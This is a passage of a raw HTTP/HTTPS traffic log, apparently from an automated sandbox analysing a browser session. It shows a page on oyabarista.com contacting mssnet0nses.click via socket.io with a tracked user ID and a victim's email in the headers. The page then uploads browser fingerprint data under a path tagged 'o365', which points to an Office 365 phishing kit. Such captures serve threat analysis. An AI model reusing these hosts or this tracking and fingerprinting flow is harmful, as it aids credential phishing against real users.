                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:03 UTC837INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:03 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H6IFe31z8pUkr2%2FIopRy3F%2FKIs2%2BoAmdncZze8%2BQx6WHfukT9DJhRsD6ikhCK%2FbqNAC85ICwqp3n1X%2Bcp%2FSpml325BqQImfLvJS8uUWfSr3bQfAcnBRK0naJxMCFNMwYfNYrUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f0c685a3f3b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83733&min_rtt=83722&rtt_var=17678&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1022&delivery_rate=36496&cwnd=252&unsent_bytes=0&cid=cc013f19947ef796&ts=304&x=0"
                                                        2025-03-27 13:42:03 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:42:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        90192.168.2.549843172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:03 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrg8S HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:03 UTC943INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:03 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YPuO8o6tSUA60Rj2teBzokqcshF0kveQ8NVKaA98bVxrABQNv4fzELuQijsr2lry%2Fw6ds8rQRv2ReG2pY2clzaCM2zGykzoq7SlzWXv4fGQ%2BxyODX%2F%2B42IEU7YdvWq8dabZDfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f11e9257611-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83808&min_rtt=83783&rtt_var=17696&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1139&delivery_rate=36461&cwnd=252&unsent_bytes=0&cid=542bd5435ee511da&ts=265&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        91192.168.2.549844172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:04 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrg8S HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:04 UTC849INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:04 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etzmN4OjizbXZz7yTyupJIhPm6QPNUHmzL1a6HFQR%2F%2BG1Ntn9mLHUYC3dHpViTTxiShOPWM0fRGdULUuM5baQPT9WSji3ryELfip8V5DhtBbAPQFa%2BgPw8%2FZwTtOV2M8o10XJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f14ac51433a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84500&min_rtt=84474&rtt_var=17835&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1239&delivery_rate=36176&cwnd=252&unsent_bytes=0&cid=fbad6aca26e999b7&ts=311&x=0"
                                                        2025-03-27 13:42:04 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 61 48 62 5f 6d 74 37 6c 74 70 62 78 42 49 55 6a 41 41 66 4c 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"aHb_mt7ltpbxBIUjAAfL","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        92192.168.2.549846172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:04 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrgMx&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:04 UTC947INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:04 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6gCzFmPBYvW6Ktw46TmwQHi00vbpG5OeqBOJGEL61wv%2F7%2F1132PEVX5eWqzL8Ygx%2B6gAbiAzYnnnZruk1LUpOkE%2FFAgkXsZ72AayAG2eknUYJ%2Bmn3q6rhXiNYvS7QMLcZRK%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f17b9627611-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83846&min_rtt=83724&rtt_var=17851&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1165&delivery_rate=36335&cwnd=252&unsent_bytes=0&cid=b81b9bacf3c1d7d1&ts=259&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        93192.168.2.549845172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:04 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrgMy&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:04 UTC953INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:04 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JY42Or0yvZ6ILEMjahzVw6eoyHNGW4wH6P%2B2mEIEwcRcR9a%2Flz8aFCYXHZ0hKh%2FgBHM1%2FeYezw4RopNS4%2F6rNbae%2B19Kb%2Fne%2BiZR5mtrSIDPshe0khNWP3IcGc%2BGMrIPDomUvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f17bdb69820-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83921&min_rtt=83839&rtt_var=17813&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1164&delivery_rate=36344&cwnd=250&unsent_bytes=0&cid=f258cd0b40b93264&ts=304&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        94192.168.2.549847172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:04 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: ruzgv2+4Gy1MQ6jhsQClRQ==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:42:04 UTC282INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:04 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f17c8ad4356-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:42:04 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:42:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        95192.168.2.549848172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:04 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrg8S HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:04 UTC846INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:04 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3B6XdFRKpP1xqI4sGLnShY3TtsBsOiCZ1jdHSPAy8ItmPDAv8yupnO0cGPAD1odg3bXX91rU1S8aeTDHfAm%2BcfYoVpU8z9vGPEoPjt4A2MKxmOQgAYdKLC%2F9cCA%2BoYPdurOCKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f17cb90425c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83414&min_rtt=83375&rtt_var=17653&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=997&delivery_rate=36595&cwnd=252&unsent_bytes=0&cid=867c13f591c3d4e6&ts=303&x=0"
                                                        2025-03-27 13:42:04 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 72 35 38 4b 54 34 46 4a 45 37 52 75 78 44 42 76 41 41 66 4e 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"r58KT4FJE7RuxDBvAAfN","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        96192.168.2.549849172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:05 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrgMx&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:05 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:42:05 UTC838INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:05 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpsE48tbdT3BZNJUg1LelbVbWrvymKkHfIiNLKxvMYaHMLSZcr0BfnLJ%2BGQtqgryG49QUEIHRBxtVa6UFUFVafe3KJFcb%2FlXfeoNGYztYF1qIisQSgZVfzitg%2FOgWr8rfoNM2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f1a6e5172a5-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83788&min_rtt=83741&rtt_var=17736&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1348&delivery_rate=36440&cwnd=252&unsent_bytes=0&cid=c9612326eec087b1&ts=312&x=0"
                                                        2025-03-27 13:42:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:42:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        97192.168.2.549850172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:05 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrgMy&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:05 UTC849INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:05 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bt8TWZ6XQr6TTwI3n3KwG8o9y1Q3W6lWEg1zspKbIP8nNJr4MzZM2Kz7hy8Q03Rf5u%2BwqKGciYl2uNSIA%2BZx4rQ26tnAZw71t%2FRieQOfzUx%2BL49T0fObyqC7Ctp9SBRL7RTnVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f1aa89ac461-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83195&min_rtt=83110&rtt_var=17579&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1264&delivery_rate=36735&cwnd=252&unsent_bytes=0&cid=22a940832f819fed&ts=757&x=0"
                                                        2025-03-27 13:42:05 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        98192.168.2.549851172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:05 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrgMx&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:05 UTC795INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:05 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f6PETlHHpXznNJUoSvRm%2BIC1D183lQjrzwfUvUnvTmV3o82ydbDJgrObHnLSWfMjKvxG0NEd5iQnRHj0pR%2FV9xvVoo4v2WlyLpR8N41XpkWxeyio9f3dotlnKeILvjm9lGqUkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f1d7c787c99-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83757&min_rtt=83705&rtt_var=17683&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=36500&cwnd=252&unsent_bytes=0&cid=080d0803a775f2aa&ts=306&x=0"
                                                        2025-03-27 13:42:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        99192.168.2.549841104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:05 UTC1021OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:05 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:42:05 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
